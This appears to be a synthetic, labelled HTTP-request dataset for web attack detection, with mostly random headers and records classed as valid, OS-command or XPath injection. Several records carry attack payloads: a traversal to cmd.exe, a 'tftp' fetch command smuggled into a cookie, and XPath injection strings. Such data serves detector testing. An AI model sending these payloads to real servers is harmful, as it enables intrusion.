UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/5.0 168.162.201.153:17786, 3.8 www.rs8c.html
Transfer-Encoding: compress
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40886
Start - Id: 28174
class: Valid
GET /aJ3Do/cZLbB./8mhpCir5ocudtntientj/8soQmFMxzjhlnlEdq./ekRxxOWHZWGgkrVNFc/pqA-x/OjeI3-objectE5T8/6ysna41r/5w8pavchildpUnI/fromnullo.swf? HTTP/1.1
Host: www.o8pho.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aiete-im, e-ango;q=0.1, w-assurt, ca9t-hN;q=0.7, tndn-syzh1idp
Cache-Control: no-cache
Client-ip: 221.141.132.92
Cookie: pef6tuhy=43;arandn=bMO0N
Cookie2: $Version="8"
Date: Mon, 13 Apr 09 10:21:02 GMT
ETag: "JPzvAVdt4Fdgny72bU"
Expect: cmGhof4A=ehaaa;godae
From: 5sno9a@sllb.be
If-Modified-Since: Sun, 24 Jun 07 22:03:44 CET
If-Unmodified-Since: Sun, 12 Jun 05 09:55:52 CET
If-Match: "-0AzCdF761NcoKvpdpR"
If-None-Match: "R5wknhoJPQET1h7rm7"
If-Range: Sat, 24 Apr 04 01:03:01 GMT
Max-Forwards: 9317
MIME-Version: 1.1
Pragma: lmCeIa=ceoejel
Proxy-Authorization: NTLM bWVuc2d6U2VyZXIxYmU5cmRqb3NoZXhvakxzamd0dGhhMXRpb2laNnJ0dHNhZXN0
Authorization: sehpnt MhopA=adn4Ieed
Range: 41-7,-70107,-4601
Referer: http://ungl.net/jyiho6wk.swf
TE: trailers,trailers
Trailer: Referer
User-Agent: t62cv2tes/7.9.5
UA-CPU: Sparc
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 709x9320
Via: 5.3 60.82.133.191, Taeogh/0.0 www.mag4usa.png
Transfer-Encoding: identity
Upgrade: iers3/6.1
Warning: 392 www.qhxhGl.png "eSdirkobe" 
X-Forwarded-For: 166.20.66.203
X-Serial-Number: 738445299
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28174
Start - Id: 44560
class: OsCommanding
GET /f8tu/swSLvYPwL56aOdkkj4.swf? HTTP/1.1
Host: www.iiei3.cz
Connection: re5dt
Accept: image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=958
Cookie: teejsanastz=2tp;eeThhssnsffateS=d0He;R6=234.153.45.42; tftp 192.168.10.33 test.txt;vd7aedatto=wBuie:oreplaceT(pmochant]
Cookie2: $Version="7"
Date: Fri, 25 Mar 05 15:43:38 GMT
If-Match: *
If-Range: *
Max-Forwards: 7866
Referer: http://re7rnPLr.biz/mgeslhl/rtmO/itbteio/2seTause.mspx
User-Agent: ewHnemocq (q_b13LQZx7; erZOlHMF; 2O2_ya9dP; hbZyt8; fAsM4mW)
Via: FTP/9.6 61.125.76.15
Warning: 866 179.141.174.244 "ctoetcolYnenkh" 
----: ------------------

null

End - Id: 44560
Start - Id: 7639
class: Valid
POST /R-aV@iiW5WJJ/ztnl8ec8oyc9p/wgkAcWh/enniodyi7tjun6sA/gHeu6i/ruaruesd3onOnsieIEzh.html? HTTP/1.0
Content-Length: 49
Content-Language: sm,irsryEm
Content-Encoding: deflate
Content-Location: http://ol0ucb.biz/dwtncghe/lirti/eneeeet/onaciett/edh3i.css
Content-MD5: dHNlcGFvYjFscmlubW9BZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Mar 10 07:30:32 CET
Last-Modified: Mon, 05 Jun 06 10:52:38 UTC
Host: www.utehwa.gov
Connection: ebft
Accept: video/*;q=0.9, audio/x-wav
Accept-Charset: *;q=0.4
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 227.168.88.151
Cookie: Eaenf5k1ief6=0671
Cookie2: $Version="4"
Date: Thu, 04 Sep 08 04:17:50 UTC
ETag: "sTrqN8Gk8OsLTPg"
Expect: 100-continue
From: NSco@ktL8w.de
If-Modified-Since: Wed, 14 Jul 04 18:13:18 CET
If-Unmodified-Since: Fri, 16 Oct 09 17:51:42 GMT
If-Match: "fhAdl9SvvZ0GTose@E"
If-None-Match: *
If-Range: "c-x-O-QN9-dJ877"
Max-Forwards: 6314
MIME-Version: 7.0
Pragma: tb5K=tIdconee
Proxy-Authorization: Basic cjYzcGpzcnM6bGVzZQ==
Authorization: hmtpx Eetsyts5=oajte
Range: -601
Referer: http://eeig.st/Toemeot.php
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.1 (compatible; MSIE 6.0; Win 9x; sdtmea; daRlhea; 4aedotrlf)
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 045x2419
Via: 7.4 www.Hd5hc.tiff, FTP/0.7 www.cs8o.js
Transfer-Encoding: gzip
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

cfDderfA= 9a&l2oprocessing-instruction=sFupjGvNGz

End - Id: 7639
Start - Id: 12268
class: Valid
GET /S9@yIKJdZs/aWcedXL2fTt41pQ@jG/sXdSpjlgDYN6YT@8k/ndohinGEc/iQ9MUDIiJ7K/eWRpS8Ncopy.winntju@/rwHa.02Q3.zuf/bYTTS.asmx?seaetsOta5a=%5Bt%2F%2Fsv6ceoRmlo&NN_DXQJx=ejTnl&hkkhfte8cgdyou=02tteA&auSrd4qR7vgc=752716&r8tipnfhnsel0=%7CdivofaCv&i8teiAohoirl=Ds3bxym1rj9ft7&aicN6eph6mide=boot.iniae%7EsFn07a&oL2sa7ssuds=70&bt=ebqjmH6pevu&sskRewfnhopbi=c%3D&Dthtsejilr=9e&oen2kn9pkec=u%3Dm%3Fd&ooao=oa0Rsexrt&raOafeRll2J=l&1npe2e=iXw%40 HTTP/1.0
Host: 166.66.72.62
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: s0os=eq
Client-ip: 170.207.96.98
Cookie: ri5noty9t=?sn9l;nhwfenqa=3Ee""iotcca9lLttunionu[;doreohteefi=f h
Cookie2: $Version="853"
Date: Thu, 19 Jun 08 18:02:47 GMT
ETag: W/"tmUEoi6Fuv73Ecr"
Expect: 100-continue
From: eHtepc@eieeaea.it
If-Modified-Since: Mon, 18 Aug 08 14:35:41 GMT
If-Unmodified-Since: Wed, 21 Apr 04 16:25:40 UTC
If-Match: *
If-None-Match: "MfrpauT5bQdh1nSS"
If-Range: *
Max-Forwards: 3
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest qop=gqmIiltu
Authorization: Digest realm
Range: 9688-4015,-4,45-
Referer: /fephll/etasuie8.pl
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 4.2; wr-2e; rv:4.7.9) Gecko/60624485
UA-CPU: x86
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7901x792
Via: HTTP/6.5 146.91.95.29
Transfer-Encoding: hafrj
Upgrade: llr/1.5, sS4lb9/2.2, sr7wD/6.1, so4i/0.5
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12268
Start - Id: 44026
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 205.238.103.243
Connection: keep-alive
Accept: audio/*;q=0.4, image/png;q=0.9, application/rtf;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Wed, 07 May 08 19:14:42 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: oOei72
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sun, 30 Mar 08 04:11:40 UTC
If-Match: "oq7CIXRnKI_tzfx@"
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: Sun, 28 Feb 10 21:17:34 GMT
Max-Forwards: 0919
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Basic dGh0Y25hYTo4dGlvU3o=
Range: 67-764741,470518-20,3-202913
Referer: http://htz6sqC.cz/nsicx/e5dBb/oqwa/vetdS.htm
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 5.6; wc-oa; rv:4.2.1) Gecko/77835529
UA-CPU: PowerPC
UA-Disp: 008,2196,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44026
Start - Id: 34218
class: Valid
PUT /csn0et0taj/lvEschildL@Bo0/rh/qN5QMumRbuu3B3qaC0D/Al/nJgf2EFN.9/eodfUCxIuAq@-9X/8u/od0ieueTrt/mdaaevtayssmf/yig@6wCb1qzchild.gif? HTTP/1.1
Content-Length: 131
Content-Language: anslkst,t,agh
Content-Encoding: deflate
Content-Location: /oaegbase/andoa/anwejBk/taettes/uhRw.jpeg
Content-MD5: ZXVvdWVsZTRjb2NubHJpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 May 04 24:53:19 CET
Last-Modified: Fri, 26 Aug 05 08:14:23 CET
Host: 253.37.248.82
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.0, x-mac-korean;q=0.8, iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 2.129.247.203
Cookie: iP.Fobject9FUO=&;uecUoNn=440827043;2xp=pFr9;anaoitw=el+t
Cookie2: $Version="29"
Date: Sat, 30 Dec 06 05:02:09 CET
ETag: "Gg1B1yaE-jhaS2.AN"
Expect: 100-continue
From: tmwyT@acvot.it
If-Modified-Since: Wed, 06 May 09 13:44:19 UTC
If-Unmodified-Since: Wed, 20 Oct 04 04:32:29 GMT
If-Match: "50E6rMpilrfzF7o"
If-None-Match: "uViJnrTtQsyw908"
If-Range: Tue, 13 Nov 07 14:33:10 UTC
Max-Forwards: 2
MIME-Version: 7.6
Pragma: n95wpdoh='en'
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: Digest qop=tetfk
Range: -4
Referer: /lorcdy/eB5r5Wn0/wuNitsr/ewoblqae.js
TE: chunked,deflate;q=0.9,chunked
Trailer: Transfer-Encoding
User-Agent: nn1tEoxyoh/5.9.7.9
UA-CPU: x86
UA-Disp: 6221,5236,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1235x784
Via: 8.7 www.eeleytpa.gif, 4.7 www.ihrerS.jpg
Transfer-Encoding: identity
Upgrade: q1dho/9.3, oiavwy/8.6, emSnd/7.8
Warning: 658 86.246.59.59 "tuixeqnh6RE1" "Wed, 13 Sep 06 03:28:45 CET"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhtrikr=leIbaLylae&hmsesdoriwsm=7&ynnm6n4snkeRrs=86244&caudh8utbd=9oj(dpece3t&fmes=iae5&Aei=dyei6&ee=oonfber&vcoRy7MssDhsd=530731

End - Id: 34218
Start - Id: 5756
class: Valid
POST /5MViZ5t/cxAt1qahq/r2wha.png? HTTP/1.0
Content-Length: 20
Content-Language: pKo1eor,raoeae,tSpectsl
Content-Encoding: deflate
Content-Location: /mtcut3/tbnfeue/s4e1in6/2lgnoosR/tseeqo7e.cfm
Content-MD5: c2hyZWFac3p6YWF1c3RvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Feb 07 11:22:20 UTC
Last-Modified: Tue, 16 Aug 05 04:23:03 GMT
Host: www.soaagetts.net
Connection: Lh7upum
Accept: video/mpeg;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: mrngs-gAbtXo;q=0.3, g-dttT3;q=0.2, outss-d
Cache-Control: only-if-cached
Client-ip: 146.157.213.225
Cookie: leofastr=2;ecsiueQ=46372984;9s1ehcihg6bl=64284;aEIOchsheieriab=n-J3PowfZ;8laseti=506
Cookie2: $Version="7"
Date: Tue, 10 Nov 09 09:05:16 GMT
ETag: "WXfWa7CFg7vCUIyp"
Expect: 100-continue
From: Fsgo@SlB9asdh.it
If-Modified-Since: Mon, 24 Oct 05 11:30:06 UTC
If-Unmodified-Since: Fri, 25 Mar 05 17:03:24 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jun 05 22:57:03 GMT
Max-Forwards: 427
MIME-Version: 3.5
Pragma: nt='iX'
Proxy-Authorization: seRi Rni3ct=uedaamar
Authorization: NTLM aWUxZWJndXRzc2lvRW9oMkloZHRpd3UzZmhhZWNjaXNuZWhkYw==
Range: -15
Referer: http://lewoopva.cz/mlupNioj/ecrwNn/orhe.gz
TE: deflate,trailers
Trailer: TE
User-Agent: 8i4agtrajE/2.1.0.7.0
UA-CPU: 68000
UA-Disp: 6915,168,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2088x8163
Via: 8.7 www.o4fuH.htm, ih2ym/3.8 www.rIei0t.jpeg, FTP/8.9 www.seEeavm.jpeg
Transfer-Encoding: deflate
Upgrade: soi/5.7, trhldd/2.6
Warning: 089 www.oRtti.html:26745 "tmttce" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 74000627821208
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ulaz=)&ied=0833906

End - Id: 5756
Start - Id: 49257
class: XPathInjection
GET /LCHtyw/aRo8/oruo0uhnicdtMwdtfi/u6luhshajiOaetk.exe?tsprtgtttet=iufeanu%27%5D++%7C+++P+%7C++++%2F%2Fuser%5B+name%2Ftext%28%29+++%3D%27h5o HTTP/1.1
Host: www.0noxRp.it:71
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-8;q=0.8, utf-8;q=0.1, cp-936, windows-874;q=0.5
Accept-Encoding: compress;q=0.1, identity;q=0.0, gzip;q=0.2, deflate;q=0.3, compress
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 209.54.77.194
Cookie: sock_streamsystem@8ney7K=et
Cookie2: $Version="395"
Date: Tue, 08 Mar 05 12:16:08 UTC
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Tue, 18 Dec 07 20:44:23 GMT
If-Unmodified-Since: Sat, 02 Jan 10 11:49:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Feb 08 07:25:46 GMT
Max-Forwards: 6331
MIME-Version: 5.3
Pragma: a0efsn=4hm
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: Digest qop=n0inlm
Range: 560-83908
Referer: http://www.tzohn.uk/hbsztdt2/nr3yis6h/vtso2.avi
TE: gzip;q=0.5
Trailer: TE
User-Agent: oTeui8e/4.6.9
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 666x0440
Via: HTTP/6.8 118.225.131.73, oczh/5.9 www.PuWi.gif, stu/6.2 www.js7neaot.html
Transfer-Encoding: gzip
Upgrade: tlo1ip/4.1, endoki/3.7, 9sp/0.0, 9ost/7.6, hnSf/9.7
Warning: 766 www.bescjbow.shtml "teoihsrtpqht31emtis" "Mon, 21 Jul 08 01:55:47 CET"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49257
Start - Id: 23250
class: Valid
GET /zCa/sNli/laurieiq/sz3DHCD/r.ft5j_PUsN/e.rV4VZaGcBQkt/MEsOsnvwinnt8allaw7/wivohvn2/-UnodeDZmzK4Rxp_1As/dXuq8upmI_8Qa/gU4NCpasswdoJaft@selectBk.swf?te=0d%24ciiwindow.openlogueti-rv9&b1m4eRd=073&tgt8htrouore=7lsAbi7dapa&sv=0923&v5seuaaIOep=xp4JqJEGhld&hamnSvem=e4eet&Y-31K7=imselectt%7C&_HomT=npahuar&xifrp=A1tne2d&liis0f=oo0rDivyrM12&swlndeMshz=070984 HTTP/1.0
Host: www.9melat5enc.cz
Connection: keep-alive
Accept: application/zip, audio/x-wav, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 42.166.49.181
Cookie: zmdjKl=linkT;o3oS=F0oinua
Cookie2: $Version="0"
Date: Wed, 10 Jun 09 07:34:57 CET
ETag: W/"4Vez3-g0IHgz9o4jot"
Expect: 100-continue
From: sebe@tnldorehze.de
If-Modified-Since: Sat, 21 Apr 07 15:06:36 CET
If-Unmodified-Since: Thu, 16 Jul 09 04:27:30 UTC
If-Match: *
If-None-Match: "hkQwwUOqdV_fEoFhWKlD"
If-Range: *
Max-Forwards: 5
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: NTLM dHRhZ3NlSW1oMW5haUVvYmRzYzF0YWVtc290bnR5ZWllbnJwbk51
Range: 3-988
Referer: /burcj.zip
TE: trailers
Trailer: Connection
User-Agent: 4nTSZbI@ http://www.getibln.fr
UA-CPU: StrongARM
UA-Disp: 831,695,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: HTTP/8.5 51.110.248.13:6, 1.7 www.sgacgeS.gif:55
Transfer-Encoding: compress
Upgrade: lhdsEe/5.9, eiyn/0.7, ajfots/4.0
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 045569580616206660
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23250
Start - Id: 48366
class: XPathInjection
GET /oM/eiwaugjHJn7@9Ekzs/anoshsaireeoie/eteilstilkadrEoagaaP/nxWwCi3wE/o00y.js?tSLJVMNA=N4wAmsi3bnpiq&einJMmail0dTwp-3=yg%3Bx&gnflink@A=1332&O4eqdAu=orAt+r+ HTTP/1.0
Host: 251.162.38.92
Connection: aias
Accept: audio/x-wav;q=0.9, video/*, image/*
Accept-Charset: hz-gb-2312
Accept-Encoding: compress;q=0.7, identity;q=0.6, compress;q=0.7, compress;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 27.47.123.175
Cookie: 7tnlsa=Ntocugheotdhbbasi;eoIcal50r=o~yde;rorphsnic=onbzucnsNB;Dieevmeoem=:O~;hd7sce1oErSs=dlen;ebtltp9huf=5144376
Date: Thu, 19 Feb 04 07:04:56 UTC
ETag: "NYR8UqwqlTgjYhohloi3"
Expect: ertOneop
From: s5al6B3@ostl.it
If-Modified-Since: Mon, 10 Aug 09 15:46:31 GMT
If-Unmodified-Since: Sat, 16 Sep 06 12:25:59 CET
If-Match: "lat4Vj7FALxclsVQc"
If-None-Match: *
If-Range: Thu, 20 Jan 05 19:37:54 UTC
Max-Forwards: 0997
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: 5rEtt zyep=iae9id
Authorization: Basic ZWFpbTpyZXFu
Range: -101,-0,2257-
Referer: http://t3esceeQ.biz/eNl4/otd4/4hou.wav
TE: trailers
Trailer: User-Agent
User-Agent: 7 or  7llioa/ssnOtr/o2/child::node()[position()=5]  or    7=
UA-CPU: Sparc
UA-Pixels: 516x4086
Via: HTTP/6.5 www.syguecyb.css, FTP/6.5 132.197.45.30
Transfer-Encoding: identity
Upgrade: osanot/5.5
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48366
Start - Id: 7948
class: Valid
PUT /sv2/p-x5MZiCs/ny/1oadane3eendlhponhp/mbzlogZC@f1/rkuJ74jCPSdmJ6AA/Qp/nqaeNo/o7tsreeeeEeeidil/ncq28Or/aes/ottme.gif? HTTP/1.0
Content-Length: 35
Content-Language: r,Isu,sF
Content-Encoding: compress
Content-Location: /roaNDt/r8rx/1mwosEi/onseY9c/24cdAg7r.dll
Content-MD5: ZWV3c2Vnc3JjZHdlaUZpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 10 08:41:17 UTC
Last-Modified: Thu, 20 Jul 06 17:41:07 GMT
Host: www.eebtaa3ict.gov
Connection: close
Accept: text/*, image/png, image/jpeg;q=0.6
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ieuo-avari, ch4-Heiisli
Cache-Control: no-store
Client-ip: 225.243.67.249
Cookie: nFo=iremedGut;enOfrit=tsamt4it
Cookie2: $Version="4"
Date: Fri, 17 Dec 04 16:40:12 UTC
ETag: W/"ziPuCXh3nnhUVa@V8AjO"
Expect: ociler7e
From: nhostr0g@gey2ahsod.de
If-Modified-Since: Sun, 29 Mar 09 05:19:49 UTC
If-Unmodified-Since: Fri, 11 Nov 05 17:22:49 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Sep 06 16:14:03 CET
Max-Forwards: 708
MIME-Version: 1.5
Pragma: ekec1wyc=nhao2pt
Proxy-Authorization: Basic a3B3UGl1Omh0bWl0dHhl
Authorization: Digest realm
Range: -0226,-162
Referer: http://www.pnntkoe.uk/qD5keeh.gz
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 0.3; os-oe; rv:6.2.0) Gecko/93425207
UA-CPU: StrongARM
UA-Disp: 1557,362,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7210x017
Via: 6.4 www.lam5.html, FTP/4.9 www.tmnhTt.jpeg:9
Transfer-Encoding: oOt7t; 4opltavn=itGpewu5
Upgrade: trRo/5.6, ifba/9.6, zny5I0/7.1, eloec/8.2, jblog/3.6
Warning: 024 www.O7oep.htm "aennnrtyleRmrdHsfeP" "Wed, 26 May 04 05:12:06 CET"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 940687449310
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

Ckmeizhhpt=00599522&lfpuddhie=twZ5I

End - Id: 7948
Start - Id: 6580
class: Valid
POST /eusy3ZBKT/t6531@I@C04yAI-/rpehcchruFdsetiiaot/sSlwume8ivn/dtZMILP9PKMc/ef1lttTi/oq/hvtemEaeCtsiuNteg/ldbrpr.asmx? HTTP/1.0
Content-Length: 229
Content-Language: j5j,iondhn
Content-Encoding: identity
Content-Location: http://nigkr.fr/AKiwEei.php3
Content-MD5: dG5INm9zTG1vb2lvaXdlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Apr 07 01:53:04 GMT
Last-Modified: Tue, 16 May 06 19:57:32 CET
Host: 70.45.212.87:560
Connection: close
Accept: */*
Accept-Charset: windows-1250, euc-jp;q=0.1
Accept-Encoding: 
Accept-Language: ss3ahu-tS, cst8Dl-reou, eld-aR6i1a, aenvaeh-o4ae, Te-rpeh
Cache-Control: max-stale=29
Client-ip: 236.168.16.2
Cookie: pDhnncdeg=imlcaeyh ;csonaftl=ies>solvarroe;s4fytui=9oe\;DNshhAfistreA7=39749
Cookie2: $Version="8"
Date: Wed, 21 Sep 05 09:50:12 UTC
ETag: "viI@pSKDL4kUvEhiJ"
Expect: 100-continue
From: a5yto@mejtrtseta.ch
If-Modified-Since: Wed, 12 Sep 07 14:07:36 CET
If-Unmodified-Since: Tue, 03 Jan 06 01:30:14 CET
If-Match: "y@Q1QKpvlQJSM@Xk_L.@"
If-None-Match: *
If-Range: Thu, 09 Dec 04 22:49:27 GMT
Max-Forwards: 36
MIME-Version: 9.1
Pragma: oniratas=a
Proxy-Authorization: esibRe deeeiz9p=l3et
Authorization: NTLM MmVzZWlvbHJldGNhbGxyYWl1aXNnZThpZnRrZWVubEU=
Range: -45,964658-8
Referer: http://www.occf.com/eVzFniue.conf
TE: gzip;q=0.8,deflate
Trailer: Accept
User-Agent: Mozilla/5.1 (compatible; Konqueror/5.0; Linux i386; sdyn)
UA-CPU: x86
UA-Disp: 1211,4867,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2928x871
Via: kernro/4.9 250.56.157.16:00
Transfer-Encoding: identity
Upgrade: Goe/5.4
Warning: 015 www.S3hmat.js "rob00sy0uro5tLiaSgoN" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 552358
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

u9auwycAno5=47818&4aoeba=002242&njjtionhN=8psy8tsdm1ndegy&Qt4LD-b=g>ninput&ahDaveWtthna4ns=dTe3t&hc=;Ioa&&m9tl=aa u$oHi semxterm3A5nodeh&a9ealaTejh4=toeih&Wb@e8JVj=tjtOcO&tcysn3zRbtnel=4og&oaiaipixdantv=0ednPmon5llv+rys

End - Id: 6580
Start - Id: 1075
class: Valid
GET /e7PsspjGkUk/eszV7XCHncG65CZiFtWf/s0rbhsioeundn/dncezeUdoe/aHu_NqP/V_X-WYimgZkW/_RzW/7hntiodfo8FweaYoo/tnid/erubOBdY_RYvX@/dNB.sh?Nmu=%24%3Enph-ye-gYlaml9c2%2F%3Ama&5OtBeval=ey37ienvpegus&liro2rT=odIsrSs6SN8lfu7oul&ldi6esrtepuer=sr+z%28lmon&uti=pSG2WYwJC&cgada=ee+&Irrnhrtps0b=n9.Hpp7o2&o4apntcgacTetn=2561&3mgeeddsde=eauo&m1nntWaE=vhuye1sexec HTTP/1.1
Host: www.qa0sjyq.net:692
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.2, windows-1250;q=0.1, windows-1250;q=0.3, x-mac-arabic, x-mac-chinesesimp;q=0.5
Accept-Encoding: *
Accept-Language: eatUnh-t;q=0.2, ctzCsosi-no, jy2ptedj-rflrfS, b8-rAquna
Cache-Control: max-age=60
Client-ip: 199.21.110.187
Cookie: ubt=tiLP5Q;4mtsicnIrmgtit=870158;60icceofcoNo0ls=i1fv4oz.0S;arwrenorRheans=1ocbaformm;fustxr0sdissbf=oVLSSMkqVc
Cookie2: $Version="675"
Date: Thu, 01 Apr 10 21:14:18 UTC
ETag: "0mVAM-MDKcT4UqvZTS9k"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sat, 14 Jul 07 17:08:30 CET
If-Unmodified-Since: Sat, 05 Dec 09 15:11:02 GMT
If-Match: "yKz8YYdIzLQgfxbuv"
If-None-Match: "cnvCw8xwQJ.2RvWQmPa"
If-Range: Mon, 11 Sep 06 20:50:25 CET
Max-Forwards: 44
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: lazirr 0arehwe=awhe
Range: 46238-
Referer: http://rNrecaCe.biz/thla/exilab.mpeg
TE: trailers,trailers
Trailer: If-Match
User-Agent: eenmwtq/1.2
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5208x202
Via: 2.5 17.79.252.230
Transfer-Encoding: identity
Upgrade: oebee/0.9, uqel/6.0, ewa/5.3, aw7p/3.5, oosLdo/3.5
Warning: 681 241.65.101.209 "Bne8meaetNbm1aowme3" 
X-Forwarded-For: 65.243.221.166
X-Serial-Number: 50030197738095040430
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1075
Start - Id: 775
class: Valid
GET /wsLbgsoundnL-2.php3?Urtara2d=0364268&yDecmdUzp=395361&FZmA=19380&vs=eoUzv&ozEwnsadi=ycralltop&cSh1=%29w%7Ctuhttps%25r%2Bam%29xmlea%7Eob HTTP/1.1
Host: 195.108.127.163
Connection: close
Accept: text/plain;q=0.8, image/png, text/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.3, gzip;q=0.2, deflate, compress;q=0.2
Accept-Language: 9tnq-s, eaOi-aeTh
Cache-Control: no-store
Client-ip: 83.119.31.221
Cookie: 62iuwUAreplaceOj=ti1payzo
Cookie2: $Version="29"
Date: Thu, 31 Mar 05 10:38:32 UTC
ETag: W/"hIeDfmJrE.yv4EFj"
Expect: tcNWgin=hrHalpcd;eQaelket
